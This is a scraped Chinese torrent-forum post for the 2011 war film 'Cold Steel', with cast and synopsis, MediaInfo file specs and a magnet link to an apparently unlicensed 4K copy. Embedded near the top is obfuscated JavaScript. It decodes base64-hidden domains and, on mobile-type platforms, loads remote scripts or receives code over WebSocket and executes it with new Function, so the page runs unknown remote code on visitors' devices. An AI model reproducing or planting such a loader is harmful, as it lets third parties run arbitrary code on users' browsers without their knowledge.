遍地狼烟.Cold.Steel.2011.2160p.WEB-DL.H265.AAC 5.97GB

版主小s 1月前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 遍地狼烟 / Cold Steel
◎年  代 2011
◎产  地 中国大陆
◎类  别 动作 / 爱情 / 战争
◎语  言 汉语普通话 / 日语
◎上映日期 2011-12-02(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt2319805/
◎豆瓣评分 5.8/10 (6497人评价)
◎豆瓣链接 https://movie.douban.com/subject/4328442/
◎片  长 101分钟
◎导  演 胡大为 David Wu (id:1301332)
◎编  剧 胡大为 David Wu (id:1301332)
◎演  员 何润东 Peter Ho (id:1050590)
       宋佳 Jia Song (id:1042341)
       梁家辉 Tony Leung (id:1118167)
       何晟铭 Shengming He (id:1313000)
       郭明翔 Ming-xiang Guo (id:1316463)
       于荣光 Ringo Yu (id:1274556)
       陈司翰 Victor Chen (id:1275720)
       吴飞霞 Angeles Woo (id:1322423)
       郑子寒 Zihan Zheng (id:1365701)

◎标  签 战争 / 狙击手 / 国产 / 狙击 / 中国 / 爱情 / 动作 / 2011

◎简  介
  电影《遍地狼烟》同名小说出自网络知名作家“菜刀姓李”(李晓敏)之手。网络付费总点击量超过3千万,曾参选第八届茅盾文学奖,成功跻身81部入围作品。                                    
                                牧良逢(何润东 饰)牧良逢是一个生长在湖南怀化市一个名叫风铃渡镇上的山里孩子,无父无母,从小跟着爷爷在森林里以打猎为生。牧良逢对枪天生有着一种独特的天赋,练就了一手好枪法,猎物百打百中,在山里过着平静安详的生活。因为茶馆老板娘柳烟(小宋佳 饰)抱不平,刀砍兵痞,被带到军营。途中,一场狙击战显露其神枪手潜质,后被猛子(梁家辉 饰)编入狙击排,从此与小伍(何晟铭 饰)等一起踏上了狙击手的生涯……

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 遍地狼烟[email protected]
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/mp41)
  7. File size                                : 5.97 GiB
  8. Duration                                 : 1 h 35 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 8 942 kb/s
  11. Writing application                      : Lavf58.38.101
  12. Video
  13. ID                                       : 1
  14. Format                                   : HEVC
  15. Format/Info                              : High Efficiency Video Coding
  16. Format profile                           : Main [email protected]@High
  17. Codec ID                                 : hev1
  18. Codec ID/Info                            : High Efficiency Video Coding
  19. Duration                                 : 1 h 35 min
  20. Bit rate                                 : 8 808 kb/s
  21. Width                                    : 3 840 pixels
  22. Height                                   : 2 160 pixels
  23. Display aspect ratio                     : 16:9
  24. Frame rate mode                          : Variable
  25. Frame rate                               : 25.000 FPS
  26. Minimum frame rate                       : 25.000 FPS
  27. Maximum frame rate                       : 90 000.000 FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Bits/(Pixel*Frame)                       : 0.042
  32. Stream size                              : 5.88 GiB (99%)
  33. Codec configuration box                  : hvcC
  34. Audio
  35. ID                                       : 2
  36. Format                                   : AAC LC
  37. Format/Info                              : Advanced Audio Codec Low Complexity
  38. Codec ID                                 : mp4a-40-2
  39. Duration                                 : 1 h 35 min
  40. Bit rate mode                            : Variable
  41. Bit rate                                 : 125 kb/s
  42. Maximum bit rate                         : 148 kb/s
  43. Channel(s)                               : 2 channels
  44. Channel layout                           : L R
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 46.875 FPS (1024 SPF)
  47. Compression mode                         : Lossy
  48. Stream size                              : 85.7 MiB (1%)
  49. Language                                 : English
  50. Default                                  : Yes
  51. Alternate group                          : 1


TAGS 动作 爱情 战争

磁力链:
  • magnet:?xt=urn:btih:5D9E03B6717D1801DF2F9945D68ED77AE9CBF31C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回